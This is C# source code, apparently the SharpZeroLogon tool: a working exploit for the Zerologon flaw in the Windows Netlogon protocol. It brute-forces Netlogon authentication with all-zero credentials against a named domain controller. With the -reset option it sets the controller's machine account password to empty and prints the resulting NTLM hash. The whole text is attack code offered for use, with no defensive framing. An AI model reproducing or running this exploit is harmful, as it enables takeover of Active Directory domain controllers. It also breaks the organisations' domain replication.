public static extern int I_NetServerPasswordSet2( string PrimaryName, string AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, string ComputerName, ref NETLOGON_AUTHENTICATOR Authenticator, out NETLOGON_AUTHENTICATOR ReturnAuthenticator, ref NL_TRUST_PASSWORD ClearNewPassword );
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount) { byte[] plaintext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; byte[] ciphertext = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; NETLOGON_CREDENTIAL palintextcred = new NETLOGON_CREDENTIAL { data = plaintext }; NETLOGON_CREDENTIAL chiphertextcred = new NETLOGON_CREDENTIAL { data = ciphertext }; NETLOGON_AUTHENTICATOR plainAuth = new NETLOGON_AUTHENTICATOR { Credential = palintextcred, Timestamp = 0 }; NETLOGON_AUTHENTICATOR cipherAuth = new NETLOGON_AUTHENTICATOR { Credential = chiphertextcred, Timestamp = 0 }; IntPtr pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth)); Marshal.StructureToPtr(plainAuth, pcred, false); IntPtr ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth)); Marshal.StructureToPtr(cipherAuth, ccred, false); IntPtr computernamePtr = Marshal.StringToHGlobalUni("Neverland"); IntPtr targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount); NL_TRUST_PASSWORD tpass = new NL_TRUST_PASSWORD(); IntPtr ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(tpass)); Marshal.StructureToPtr(tpass, ptpass, false); NTSTATUS rpcStatus = (NTSTATUS)NetServerPasswordSet2(GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero, targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, computernamePtr, pcred, ccred, ptpass); return((NTSTATUS)rpcStatus); }
static void Main(string[] args) { if (args.Length < 1) { Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>"); return; } bool reset = false; bool patch = false; string fqdn = args[0]; string hostname = fqdn.Split('.')[0]; foreach (string arg in args) { switch (arg) { case "-reset": reset = true; break; case "-patch": patch = true; break; } } if (patch) { if (!PatchLogon()) { Console.WriteLine("Patching failed :("); return; } Console.WriteLine("Patch successful. Will use ncacn_ip_tcp"); } NETLOGON_CREDENTIAL ClientChallenge = new NETLOGON_CREDENTIAL(); NETLOGON_CREDENTIAL ServerChallenge = new NETLOGON_CREDENTIAL(); ulong NegotiateFlags = 0x212fffff; Console.WriteLine("Performing authentication attempts..."); for (int i = 0; i < 2000; i++) { if (I_NetServerReqChallenge(fqdn, hostname, ref ClientChallenge, ref ServerChallenge) != 0) { Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?"); return; } Console.Write("="); if (I_NetServerAuthenticate2(fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref ClientChallenge, ref ServerChallenge, ref NegotiateFlags) == 0) { Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack."); NETLOGON_AUTHENTICATOR authenticator = new NETLOGON_AUTHENTICATOR(); NL_TRUST_PASSWORD ClearNewPassword = new NL_TRUST_PASSWORD(); if (reset) { if (I_NetServerPasswordSet2( fqdn, hostname + "$", NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel, hostname, ref authenticator, out _, ref ClearNewPassword ) == 0) { Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0"); return; } Console.WriteLine("Failed to reset machine account password"); } return; } } Console.WriteLine("\nAttack failed. Target is probably patched."); }